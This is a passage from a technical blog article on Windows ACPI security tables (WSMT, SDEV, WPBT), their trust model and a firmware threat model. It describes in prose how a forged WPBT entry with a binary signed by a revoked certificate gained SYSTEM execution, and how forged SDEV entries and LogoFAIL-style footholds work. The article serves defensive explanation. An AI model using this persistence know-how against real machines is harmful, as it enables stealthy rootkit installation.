&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft&apos;s OEM page on Virtualization-based security makes WSMT compliance with the corresponding Protection Flags asserted a hard prerequisite for VBS launch [@oem-vbs]. A laptop without WSMT, or with the flags clear, may report that VBS is &lt;em&gt;available&lt;/em&gt; and yet refuse to start it on every boot.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The structural punchline lands here, in Microsoft&apos;s own words:&lt;/p&gt;

Because SMM is opaque to the operating system, it is not possible to produce a test which runs in Windows to verify that the protections prescribed in the WSMT specification are actually implemented in SMM. From the operating system, the only check that is possible is to look for the presence of the WSMT, and check the state of all defined Protection Flags. -- Microsoft Learn, *Windows SMM Security Mitigations Table* [@ms-oem-uefi-wsmt]
&lt;p&gt;This is the article&apos;s second &lt;em&gt;aha&lt;/em&gt; moment. &lt;em&gt;Windows reads the flags. Windows trusts the flags. Windows cannot verify the flags.&lt;/em&gt; The OEM declares; Windows reads; Windows cannot refute. Once you internalise that idiom, every other ACPI security table in this article reads as a variation on it. SDEV declares which devices are secure. WPBT declares which binary is signed. DMAR declares which RMRR ranges are legitimate. In every case, the OEM authors a property and Windows believes it.&lt;/p&gt;
&lt;p&gt;A worked example makes the consequence concrete. Open a PowerShell prompt and run &lt;code&gt;Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard&lt;/code&gt;. The two fields that matter are &lt;code&gt;VirtualizationBasedSecurityStatus&lt;/code&gt; (0 = off, 1 = enabled but not running, 2 = running) and &lt;code&gt;SecurityServicesRunning&lt;/code&gt; (an array, where 1 = Credential Guard and 2 = HVCI). On a machine where WSMT is missing or its flags are clear, you may see &lt;code&gt;VirtualizationBasedSecurityStatus = 1&lt;/code&gt; and an empty &lt;code&gt;SecurityServicesRunning&lt;/code&gt; array. The system &lt;em&gt;intends&lt;/em&gt; to run VBS. The system &lt;em&gt;cannot&lt;/em&gt; run VBS. The cause is invisible until you consult the DeviceGuard WMI class -- and even then, the WSMT influence is implicit, not named.&lt;/p&gt;
&lt;p&gt;WSMT tells the hypervisor what SMM promised not to do. The next table tells the hypervisor which devices to wall off from non-secure code in the first place. Its name is SDEV.&lt;/p&gt;
&lt;h2&gt;5. SDEV: The Firmware Tells the Hypervisor Which Devices Are For Trustlets Only&lt;/h2&gt;
&lt;p&gt;Your Windows Hello IR camera is supposed to be unreachable from a kernel-mode rootkit. How does Windows know it is the IR camera the firmware claims it is, and not, say, a USB device the attacker plugged in five seconds ago?&lt;/p&gt;
&lt;p&gt;The answer is SDEV. The ACPI 6.5 specification, Section 5.2.27, is unusually candid about what the table is and is not [@acpi-65-sdev]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;The Secure DEVices (SDEV) table is a list of secure devices known to the system. The table is applicable to systems where a secure OS partition and a non-secure OS partition co-exist. A secure device is a device that is protected by the secure OS, preventing accesses from non-secure OS. The table provides a hint as to which devices should be protected by the secure OS. The enforcement of the table is provided by the secure OS and any pre-boot environment preceding it. &lt;strong&gt;The table itself does not provide any security guarantees.&lt;/strong&gt;&quot;&lt;/p&gt;
&lt;/blockquote&gt;

The table itself does not provide any security guarantees. -- ACPI Specification 6.5, Section 5.2.27 [@acpi-65-sdev]

An ACPI table introduced in ACPI 6.2 (May 2017) that enumerates the devices the firmware believes should be partitioned into the Secure Kernel rather than the normal kernel. The Windows-side consumer struct is `_SDEV_SECURE_ACPI_INFO_ENTRY`, available since Windows 10 version 2004 (May 2020) [@ms-sdev-struct].
&lt;h3&gt;The three states a device can be in&lt;/h3&gt;
&lt;p&gt;The spec defines three SDEV states, and they map directly onto what the Secure Kernel does at boot [@acpi-65-sdev]:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;SDEV state&lt;/th&gt;
&lt;th&gt;Spec language&lt;/th&gt;
&lt;th&gt;Operational consequence&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Listed, Allow-Handoff clear&lt;/td&gt;
&lt;td&gt;&lt;em&gt;&quot;the device should be always protected within the secure OS . . . the secure OS may require that a device used for user authentication must be protected to guard against tampering by malicious software&quot;&lt;/em&gt;&lt;/td&gt;
&lt;td&gt;Device is owned by VTL1 for the lifetime of the boot; the normal kernel cannot reach it&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Listed, Allow-Handoff set&lt;/td&gt;
&lt;td&gt;&lt;em&gt;&quot;the device should be initially protected by the secure OS, but it is up to the discretion of the secure OS to allow the device to be handed off to the non-secure OS when requested&quot;&lt;/em&gt;&lt;/td&gt;
&lt;td&gt;Secure Kernel takes ownership at boot but may release the device to VTL0 on demand&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Not listed&lt;/td&gt;
&lt;td&gt;&lt;em&gt;&quot;no hints are provided. Any OS component that expected the device to be in secure mode would not correctly function&quot;&lt;/em&gt;&lt;/td&gt;
&lt;td&gt;Features that need a secure-device anchor (Enhanced Sign-in Security for Windows Hello, the vTPM trustlet) silently disable&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The two SDEV entry types are, from ACPICA&apos;s &lt;code&gt;actbl2.h&lt;/code&gt;: &lt;em&gt;&lt;code&gt;ACPI_SDEV_TYPE_NAMESPACE_DEVICE = 0&lt;/code&gt;&lt;/em&gt; (an ACPI Namespace device path like &lt;code&gt;\_SB.PCI0.XHCI&lt;/code&gt;) and &lt;em&gt;&lt;code&gt;ACPI_SDEV_TYPE_PCIE_ENDPOINT_DEVICE = 1&lt;/code&gt;&lt;/em&gt; (a PCIe Bus / Device / Function tuple). The header Flags byte uses two bits: &lt;code&gt;ACPI_SDEV_HANDOFF_TO_UNSECURE_OS&lt;/code&gt; (bit 0) and &lt;code&gt;ACPI_SDEV_SECURE_COMPONENTS_PRESENT&lt;/code&gt; (bit 1) [@acpica-actbl2-sdev]. The &lt;em&gt;Allow-Handoff&lt;/em&gt; bit is the one that decides which of the three states above applies.&lt;/p&gt;
&lt;p&gt;The Windows-side struct is published on Microsoft Learn as &lt;code&gt;_SDEV_SECURE_ACPI_INFO_ENTRY&lt;/code&gt; [@ms-sdev-struct]:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;typedef struct _SDEV_SECURE_ACPI_INFO_ENTRY {
  SDEV_ENTRY_HEADER Header;
  USHORT IdentifierOffset;
  USHORT IdentifierLength;
  USHORT VendorInfoOffset;
  USHORT VendorInfoLength;
  USHORT SecureResourcesOffset;
  USHORT SecureResourcesLength;
} SDEV_SECURE_ACPI_INFO_ENTRY;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The Windows-side consumer struct lists &lt;em&gt;&quot;Minimum supported client: Windows 10, version 2004&quot;&lt;/em&gt; [@ms-sdev-struct]. That is May 2020, three years after SDEV was introduced in ACPI 6.2 (May 2017). ACPI tables routinely outlive the OS consumers that read them by years; the table set is a bus, and consumers attach to it on their own schedule.&lt;/p&gt;
&lt;h3&gt;How SDEV becomes trustlet ownership&lt;/h3&gt;
&lt;p&gt;The Secure Kernel does not consume SDEV directly to start a &lt;a href=&quot;https://paragmali.com/blog/vbs-trustlets-what-actually-runs-in-the-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;trustlet&lt;/a&gt;. SDEV is the &lt;em&gt;hint&lt;/em&gt;; the binding to a specific trustlet is encoded in Windows policy and OEM driver INFs. The companion article on VBS trustlets walks the trustlet IDs in detail [@vbs-trustlets-sibling]; the routing is implicit.&lt;/p&gt;

flowchart TD
    A[Firmware lists device in SDEV] --&amp;gt; B{Allow-Handoff bit set?}
    B --&amp;gt;|Clear -- always secure| C[Trustlet-aware driver present?]
    B --&amp;gt;|Set -- handoff allowed| D[Trustlet-aware driver present?]
    C --&amp;gt;|Yes| E[Device owned by VTL1 trustlet -- BioIso / LsaIso / vmsp]
    C --&amp;gt;|No| F[Device unusable -- ESS feature silently disabled]
    D --&amp;gt;|Yes| G[Trustlet may release device to VTL0 on request]
    D --&amp;gt;|No| H[Device falls back to VTL0 ownership]
    A2[Device not in SDEV] --&amp;gt; I[No trustlet ownership; ESS, vTPM disabled]

The full mapping is documented in the VBS Trustlets companion article [@vbs-trustlets-sibling]. The short version: the Windows Hello IR camera for Enhanced Sign-in Security is routed to BioIso (the Secure Biometrics trustlet) via its SDEV listing; smart-card readers and PINs that flow through Credential Guard are routed to LsaIso; the discrete TPM device path, when SDEV-listed, is routed to the vTPM trustlet (vmsp). Fingerprint sensors in ESS use a separate Match-on-Sensor + USB-Secure-Connection path that is not driven by SDEV. The structural gap is that SDEV does not name *which* trustlet a device should be routed to. The binding is implicit in OEM driver INFs and Windows policy, and a multi-trustlet platform cannot rely on the table to express routing.
&lt;h3&gt;Where SDEV becomes a Secured-core PC certification gate&lt;/h3&gt;
&lt;p&gt;The current OEM Standards for highly secure Windows 11 devices page makes SDEV authoring an explicit certification gate when the platform claims Windows Hello with Enhanced Sign-in Security: &lt;em&gt;&quot;A device with Windows Hello with ESS is enabled if it has the ESS hardware built-in components for face or fingerprint authentication, and the necessary support in BIOS&quot;&lt;/em&gt; [@oem-highly-secure-11]. For the face-authentication path, the SDEV listing of the Windows Hello IR camera is, in practice, what &lt;em&gt;&quot;the necessary support in BIOS&quot;&lt;/em&gt; cashes out to. (Fingerprint authentication in ESS uses Match-on-Sensor with a USB Secure Connection -- a different protection mechanism that does not flow through SDEV.) Without the IR-camera SDEV entry, the hardware exists, the driver loads, the user&apos;s face is captured -- and the secure pipeline never engages, because the Secure Kernel was never told the camera was its responsibility.&lt;/p&gt;
&lt;p&gt;Three observable failure families recur. &lt;em&gt;Device not listed&lt;/em&gt; surfaces as Enhanced Sign-in Security silently disabling; the user sees &lt;em&gt;&quot;Windows Hello requires additional setup&quot;&lt;/em&gt; and never reaches the secure path. &lt;em&gt;Listed but driver-incompatible&lt;/em&gt; triggers the Allow-Handoff fallback and the device is owned by the normal kernel, exactly the outcome SDEV was meant to prevent. &lt;em&gt;Adversarially listed&lt;/em&gt; is the worst case: an attacker with a DXE foothold (the firmware-stage class that LogoFAIL [@nvd-cve-2023-40238] and BIOSDisconnect typify) writes a malicious SDEV entry into ACPI memory and routes a device the attacker controls into the Secure Kernel partition. That last case is what the ACPI 6.5 spec means when it says &lt;em&gt;&quot;the table itself does not provide any security guarantees.&quot;&lt;/em&gt; The Secure Kernel enforces the partition; the table only suggests where the partition should fall.&lt;/p&gt;
&lt;p&gt;The article&apos;s third recurring failure family is now visible in three of the five tables: &lt;em&gt;missing&lt;/em&gt;, &lt;em&gt;malformed&lt;/em&gt;, &lt;em&gt;forged&lt;/em&gt;. SDEV decides which devices the firmware says are secure. The next table -- WPBT -- decides which &lt;em&gt;binaries&lt;/em&gt; the firmware says Windows should run. That is the dial that, when broken, turned everything-protections-on Secured-Core PCs into rootkit hosts.&lt;/p&gt;
&lt;h2&gt;6. WPBT: The OEM Rootkit That Microsoft Designed In On Purpose&lt;/h2&gt;
&lt;p&gt;In 2012 Microsoft shipped a feature that lets the firmware drop a binary into &lt;code&gt;c:\windows\system32&lt;/code&gt; and run it at SYSTEM on every boot [@eclypsium-wpbt]. The reason was customer experience. The result was a designed-in rootkit channel.&lt;/p&gt;

A fixed-layout ACPI table whose body is a physical pointer to a binary stored in firmware memory. At every boot, the Windows session manager reads the pointer, copies the binary into `c:\windows\system32`, validates its Authenticode signature, and executes it with SYSTEM privileges before the user reaches the lock screen. ACPICA&apos;s reference header pins the conformance to *&quot;Windows Platform Binary Table (WPBT) 29 November 2011&quot;* [@acpica-actbl3-wpbt].
&lt;p&gt;The Microsoft specification, preserved verbatim by Eclypsium, describes the mechanism without flinching: &lt;em&gt;&quot;The WPBT is a fixed Advanced Configuration and Power Interface (ACPI) table that enables boot firmware to provide Windows with a platform binary that the operating system can execute. The binary handoff medium is physical memory, allowing the boot firmware to provide the platform binary without modifying the Windows image on disk&quot;&lt;/em&gt; [@eclypsium-wpbt]. The ACPICA struct is small enough to read in one breath:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;typedef struct acpi_table_wpbt {
    ACPI_TABLE_HEADER Header;
    UINT32 HandoffSize;
    UINT64 HandoffAddress;     /* physical pointer to the binary */
    UINT8  Layout;
    UINT8  Type;
    UINT16 ArgumentsLength;
} ACPI_TABLE_WPBT;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The single load-bearing field is &lt;code&gt;HandoffAddress&lt;/code&gt;: a 64-bit physical pointer to the binary. The signing requirement, again preserved verbatim by Eclypsium [@eclypsium-wpbt]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;All binaries published to Windows using the WPBT mechanism outlined in this paper must be embedded signed and timestamped. These images should be linked with the /INTEGRITYCHECK option and signed using the SignTool command-line tool with the /nph switch to suppress page hashes.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Why did Microsoft ship this? OEM customer-experience continuity across clean reinstalls. A customer who runs Windows Setup from USB and wipes their machine reasonably expects everything they paid for to come back: vendor utilities, enterprise enrolment shims, anti-theft agents. WPBT was Microsoft&apos;s answer to &lt;em&gt;&quot;how does the OEM persist its software across an OS-level reinstall?&quot;&lt;/em&gt; The answer Microsoft chose was: by handing the firmware a sanctioned channel to inject a SYSTEM-level binary into every boot. Eclypsium&apos;s own coverage records that &lt;em&gt;&quot;acclaimed researcher and co-author of Windows Internals, Alex Ionescu, has been calling out the dangers of WPBT as a rootkit as early as 2012 and continues to do so today&quot;&lt;/em&gt; [@eclypsium-wpbt].&lt;/p&gt;

sequenceDiagram
    participant FW as OEM Firmware
    participant ACPI as ACPI table set
    participant SMSS as Session Manager (smss.exe)
    participant CI as Code Integrity
    participant EXE as wpbbin.exe (SYSTEM)
    FW-&amp;gt;&amp;gt;ACPI: Build WPBT, set HandoffAddress to in-memory binary
    ACPI-&amp;gt;&amp;gt;SMSS: Session manager reads WPBT during early boot
    SMSS-&amp;gt;&amp;gt;SMSS: Copy binary from physical memory into system32
    SMSS-&amp;gt;&amp;gt;CI: Validate Authenticode signature
    CI--&amp;gt;&amp;gt;SMSS: Accept (until 2021: even revoked certs accepted)
    SMSS-&amp;gt;&amp;gt;EXE: Launch as SYSTEM, before lock screen
&lt;h3&gt;A history of WPBT abuse, in three acts&lt;/h3&gt;
&lt;p&gt;The WPBT abuse history predates the table itself. The mechanism existed informally as a BIOS Option ROM trick before it was standardised; once standardised, the abuse cases scaled [@securelist-computrace].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Incident&lt;/th&gt;
&lt;th&gt;Channel&lt;/th&gt;
&lt;th&gt;What was broken&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;2008-2014&lt;/td&gt;
&lt;td&gt;Computrace / Absolute LoJack&lt;/td&gt;
&lt;td&gt;BIOS Option ROM dropper (pre-WPBT)&lt;/td&gt;
&lt;td&gt;Vendor-installed anti-theft agent persisted across reinstalls; C&amp;amp;C protocol enabled hijacking&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2015&lt;/td&gt;
&lt;td&gt;Lenovo Service Engine (LSE)&lt;/td&gt;
&lt;td&gt;Formal WPBT (Windows 8 era)&lt;/td&gt;
&lt;td&gt;Buffer overflow allowed remote code execution via vendor-installed binary&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2018&lt;/td&gt;
&lt;td&gt;LoJax (APT28 / Sednit)&lt;/td&gt;
&lt;td&gt;UEFI rootkit reusing Computrace&apos;s persistence design&lt;/td&gt;
&lt;td&gt;First in-the-wild UEFI rootkit; survived OS reinstall and disk replacement&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2021&lt;/td&gt;
&lt;td&gt;Eclypsium &quot;Everyone Gets a Rootkit&quot;&lt;/td&gt;
&lt;td&gt;Formal WPBT signature gate&lt;/td&gt;
&lt;td&gt;Signature check accepted revoked certificates; Secured-Core PCs vulnerable&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Computrace, analysed by Vitaly Kamluk and Sergey Belov in February 2014, was the legitimate ancestor. Their post documented an Absolute Software anti-theft agent that survived clean Windows reinstalls because the firmware re-injected &lt;code&gt;rpcnetp.exe&lt;/code&gt; at every boot via a WPBT-class mechanism that predated WPBT itself: &lt;em&gt;&quot;the owner of the system claimed he had never installed Absolute Computrace and didn&apos;t even know the software was present on his computer&quot;&lt;/em&gt; [@securelist-computrace]. The reverse-engineering revealed a Russian-doll structure -- &lt;em&gt;&quot;&lt;code&gt;rpcnetp.exe&lt;/code&gt; inside &lt;code&gt;autochk.exe&lt;/code&gt; inside EFI Application inside another EFI-Application inside ROM Module&quot;&lt;/em&gt; [@securelist-computrace] -- and a C&amp;amp;C protocol weak enough that the researchers built proof-of-concept hijacking. WPBT-class persistence existed as attack surface before WPBT was a table.&lt;/p&gt;
&lt;p&gt;LSE was the first formal-WPBT abuse. CISA&apos;s August 12, 2015 alert framed it tersely: &lt;em&gt;&quot;Certain Lenovo personal computers contain a vulnerability in LSE (a Lenovo BIOS feature). Exploitation of this vulnerability may allow a remote attacker to take control of an affected system&quot;&lt;/em&gt; [@cisa-lse]. The NVD entry pinned the weakness class: &lt;em&gt;&quot;A buffer overflow vulnerability was reported, (fixed and publicly disclosed in 2015) in the Lenovo Service Engine (LSE), affecting various versions of BIOS for Lenovo Notebooks, that could allow a remote user to execute arbitrary code on the system&quot;&lt;/em&gt; [@nvd-cve-2015-5684]. LSE injected &lt;code&gt;wpbbin.exe&lt;/code&gt; into &lt;code&gt;system32&lt;/code&gt;, downloaded a separate utility called &lt;em&gt;OneKey Optimizer&lt;/em&gt;, and overwrote &lt;code&gt;autochk.exe&lt;/code&gt; to maintain persistence. The only reliable fix was an OEM BIOS update.&lt;/p&gt;
&lt;p&gt;LoJax came in September 2018. ESET&apos;s white paper documented the first in-the-wild UEFI rootkit, attributed to the Sednit / APT28 group: &lt;em&gt;&quot;This persistence method is particularly invasive as it will not only survive an OS reinstall, but also a hard disk replacement&quot;&lt;/em&gt; [@eset-lojax-html]. The persistence design was directly inspired by Computrace&apos;s LoJack; ESET noted that &lt;em&gt;&quot;In May 2018, an Arbor Networks blog post described several trojanized samples of Absolute Software&apos;s LoJack small agent, rpcnetp.exe&quot;&lt;/em&gt; [@eset-lojax-html]. A 2008-vintage anti-theft mechanism became the template for state-actor espionage.&lt;/p&gt;
&lt;h3&gt;The 2021 Eclypsium disclosure: &quot;Everyone Gets a Rootkit&quot;&lt;/h3&gt;
&lt;p&gt;In September 2021, the Eclypsium research team published the structural finding that reframed WPBT from &lt;em&gt;&quot;controversial OEM convenience&quot;&lt;/em&gt; to &lt;em&gt;&quot;structurally broken signature gate&quot;&lt;/em&gt;. The post was institutionally authored by &lt;em&gt;&quot;the Eclypsium research team&quot;&lt;/em&gt; with no by-line in the rendered article body; this article preserves that institutional attribution. The finding [@eclypsium-wpbt]:&lt;/p&gt;

While Microsoft requires a WPBT binary to be signed, it will accept an expired or revoked certificate. This means an attacker can sign a malicious binary with any readily available expired certificate. This issue affects all Windows-based devices going back to Windows 8 when WPBT was first introduced. We have successfully demonstrated the attack on modern, Secured-Core PCs that are running the latest boot protections. -- Eclypsium, *Everyone Gets a Rootkit* (September 2021) [@eclypsium-wpbt]
&lt;p&gt;The proof-of-concept was elegant in the worst way. The researchers signed a malicious binary with a Hacking Team code-signing certificate that had been revoked in 2015 (a side effect of the 2015 Hacking Team breach). They placed it in firmware memory. They wrote a WPBT entry pointing at it. On a Secured-Core PC with Credential Guard, HVCI, BitLocker, and Kernel DMA Protection all enabled, Windows ran the binary at SYSTEM before the user reached the lock screen. The signature gate was the only thing standing between the firmware and arbitrary kernel-grade code. The signature gate accepted revoked certificates.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s response was not to fix the validator [@eclypsium-wpbt]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Microsoft recommends customers use Windows Defender Application Control (WDAC) to limit what is allowed to run on their devices. WDAC policy is also enforced for binaries included in the WPBT and should mitigate this issue. We recommend customers implement a WDAC policy that is as restrictive as practical for their environment.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That is an explicit acknowledgement that the original signing-only model was structurally inadequate; the fix was outsourced to a customer-authored allow-list. WDAC is the &lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;App Identity&lt;/a&gt; sibling article&apos;s territory [@app-identity-sibling]; for the present article, the relevant fact is that the only mitigation Microsoft recommended did not change Microsoft&apos;s code. It changed the customer&apos;s policy.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; WPBT is a designed-in OEM persistence channel that, until 2021, allowed any binary signed with any code-signing certificate -- including certificates revoked years earlier -- to execute at SYSTEM on every boot of every Windows-since-8 machine, including the most heavily protected Secured-Core PCs. The fix was not a patch to the validator. The fix was to ask customers to author Windows Defender Application Control policies that constrain what WPBT may run.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The mitigation paths a defender can take today, in order of how supported they are:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Path&lt;/th&gt;
&lt;th&gt;Status&lt;/th&gt;
&lt;th&gt;What it does&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;WDAC policy over WPBT&lt;/td&gt;
&lt;td&gt;Microsoft-recommended&lt;/td&gt;
&lt;td&gt;Constrains which binaries WPBT may execute, regardless of signing-cert status&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BIOS option to disable WPBT&lt;/td&gt;
&lt;td&gt;OEM-dependent&lt;/td&gt;
&lt;td&gt;A few enterprise-class OEMs offer it; most do not&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;dropWPBT&lt;/code&gt; (community tool)&lt;/td&gt;
&lt;td&gt;Unsupported&lt;/td&gt;
&lt;td&gt;Removes the WPBT entry from in-memory ACPI before Windows reads it&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cert-revocation enforcement&lt;/td&gt;
&lt;td&gt;Unimplemented&lt;/td&gt;
&lt;td&gt;Microsoft has not changed the WPBT validator to honour revocation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

The community `dropWPBT` project on GitHub, referenced by Eclypsium in their disclosure post [@eclypsium-wpbt], is a UEFI driver that removes the WPBT entry from the in-memory ACPI table set before Windows boot manager reads it. Microsoft does not document a supported way to disable WPBT consumption from inside Windows. The Eclypsium post is explicit: *&quot;In our research, we have not found documentation from Microsoft detailing how to disable WPBT&quot;* [@eclypsium-wpbt].
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft does not document a supported way to disable WPBT consumption from inside Windows. The community &lt;code&gt;dropWPBT&lt;/code&gt; project is unsupported. Any defender who wants to neutralise WPBT must rely on either an OEM BIOS toggle (where offered) or a WDAC policy that constrains the binaries WPBT may execute.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We have walked five tables: DMAR, IORT, WSMT, SDEV, WPBT. Three failure families recur in each: omission, mistake, forgery. Time to make the threat model honest.&lt;/p&gt;
&lt;h2&gt;7. Forged, Missing, and Lying Tables: An Honest Threat Model&lt;/h2&gt;
&lt;p&gt;We have seen the tables. We have seen one of them break catastrophically. Now name the failure families honestly, because each has a different attacker, a different fix, and a different observable signal.&lt;/p&gt;

flowchart TD
    A[Failure mode] --&amp;gt; B[OEM omission]
    A --&amp;gt; C[OEM mistake]
    A --&amp;gt; D[Adversarial forgery]
    B --&amp;gt; B1[Cause: table absent or flag clear]
    B1 --&amp;gt; B2[Observable: msinfo32 / Win32_DeviceGuard]
    B2 --&amp;gt; B3[Fix: OEM BIOS update]
    C --&amp;gt; C1[Cause: table present but lying about behaviour]
    C1 --&amp;gt; C2[Observable: none from inside Windows]
    C2 --&amp;gt; C3[Fix: certification, external research, OEM BIOS update]
    D --&amp;gt; D1[Cause: attacker with DXE foothold rewrites table]
    D1 --&amp;gt; D2[Observable: requires measured ACPI to detect]
    D2 --&amp;gt; D3[Fix: WDAC over WPBT, Pluton-rooted attestation -- partial]
&lt;h3&gt;OEM omission: the most common failure&lt;/h3&gt;
&lt;p&gt;The most common case is the simplest. Kernel DMA Protection silently shows &lt;code&gt;Off&lt;/code&gt; because the OEM&apos;s DMAR is missing or because the &lt;code&gt;DMA_CTRL_PLATFORM_OPT_IN_FLAG&lt;/code&gt; is clear in the Flags byte [@oem-kernel-dma]. Windows Hello with Enhanced Sign-in Security silently disables the face-authentication path because the Windows Hello IR camera was never listed in SDEV [@oem-highly-secure-11]. VBS de-features because WSMT is missing or its three Protection Flags are partially clear [@ms-oem-uefi-wsmt]. The defender&apos;s observable surface is &lt;code&gt;msinfo32&lt;/code&gt;, the &lt;code&gt;Win32_DeviceGuard&lt;/code&gt; WMI class, and the System Summary pane; the fix in every case is an OEM BIOS update, on the OEM&apos;s release schedule, with whatever distribution latency that involves.&lt;/p&gt;
&lt;h3&gt;OEM mistake: present but lying&lt;/h3&gt;
&lt;p&gt;The second case is the worst-case from a detection standpoint, because it is unobservable from inside Windows. WSMT may report all three Protection Flags asserted on a platform whose SMI handlers were never actually rewritten to validate nested pointers. SDEV may list a device whose driver was never hardened to enforce its trustlet ownership. DMAR may declare a tight policy for a chipset whose VT-d implementation has a documented errata that defeats it. Microsoft itself states the impossibility result for WSMT in the public Learn prose [@ms-oem-uefi-wsmt]. The only mechanisms that catch this class are (a) certification programs that audit the firmware before it ships (Windows Hardware Lab Kit, Secured-core PC requirements [@oem-highly-secure-11]) and (b) external research, after the fact. The fix is, again, an OEM BIOS update.&lt;/p&gt;
&lt;h3&gt;Adversarial forgery: an attacker with a DXE foothold&lt;/h3&gt;
&lt;p&gt;The third case is the most consequential. An attacker with a foothold in the firmware boot environment -- the DXE class typified by LogoFAIL (CVE-2023-40238, the Insyde BMP decoder memory-corruption Binarly published at Black Hat Europe 2023 [@nvd-cve-2023-40238]) -- writes a new WPBT entry, or a new SDEV entry, or a different DMAR Flags value into ACPI memory before Windows reads it. The Eclypsium 2021 demonstration showed that this works against Secured-Core PCs in 2021 [@eclypsium-wpbt]. The defender&apos;s observable surface is, by construction, none unless the firmware measured the relevant tables into a TPM PCR and the hypervisor consumes that measurement. The fix is partial today: WDAC over WPBT for the binary-execution case, Pluton-rooted attestation for the table-content-drift case, and OEM BIOS hardening for everything else.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; LogoFAIL is the cleanest example of why forgery is the hardest failure family. It is a pre-OS UEFI image-parser remote code execution in DXE, the firmware execution environment that &lt;em&gt;builds&lt;/em&gt; the ACPI tables in the first place [@nvd-cve-2023-40238]. If you can patch DXE, you can patch the tables before Windows reads them. The five tables we have walked sit &lt;em&gt;below&lt;/em&gt; Secure Boot&apos;s verifier; LogoFAIL sits &lt;em&gt;below&lt;/em&gt; the five tables. Cross-link the Secure Boot sibling article for the full chain [@secure-boot-sibling].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Pluton&apos;s honest residual&lt;/h3&gt;
&lt;p&gt;Pluton-rooted attestation closes some, but not all, of the forgery gap. The TCG PC Client Platform Firmware Profile specifies how firmware events are extended into TPM Platform Configuration Registers; Microsoft requires platform firmware to extend a specific event into PCR[7] when DMA protection is disabled or downgraded: &lt;em&gt;&quot;On every boot where the IOMMU (VT-D or AMD-Vi) or Kernel DMA Protection are disabled, will be disabled, or configured to a lower security state, the platform MUST extend an EV_EFI_ACTION event into PCR[7] before enabling DMA. The event string SHALL be &apos;DMA Protection Disabled&apos;&quot;&lt;/em&gt; [@oem-kernel-dma]. That is the only narrowly-specified flow in this article that lets a remote verifier learn -- via TPM quote -- that the table set was downgraded between firmware build and OS boot.&lt;/p&gt;
&lt;p&gt;It is also a single example. The general case -- &lt;em&gt;&quot;every security-bearing ACPI table was measured into a known PCR at firmware load, and the hypervisor refuses to launch trustlets if the measurement does not match a known-good baseline&quot;&lt;/em&gt; -- is not a deployed mechanism on Windows today. Pluton-as-TPM is a precondition; the measurement schema is the missing piece [@ms-pluton; @pluton-sibling].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Pluton-rooted measured boot closes the &lt;em&gt;freshness gap&lt;/em&gt; (the table did not change between firmware build and OS parse). It does not close the &lt;em&gt;contents-correctness gap&lt;/em&gt; (the table contents were correct at firmware build in the first place). A WSMT with all three flags asserted by an OEM that did not actually harden their SMM handlers will measure the same way every boot, and the Pluton-rooted attestation will faithfully report it as valid. The contents-correctness problem requires either out-of-band certification (Secured-core PC) or a fundamentally different architecture (a vendor-controlled hardware-software stack, as on Apple&apos;s Secure Enclave-equipped silicon) -- not measured boot.&lt;/p&gt;
&lt;/blockquote&gt;

The window in which an attacker may modify an ACPI table after the firmware authored it but before the operating system reads it. Pluton-rooted measured boot detects modifications in this window because the PCR measurement at boot will not match the known-good baseline.

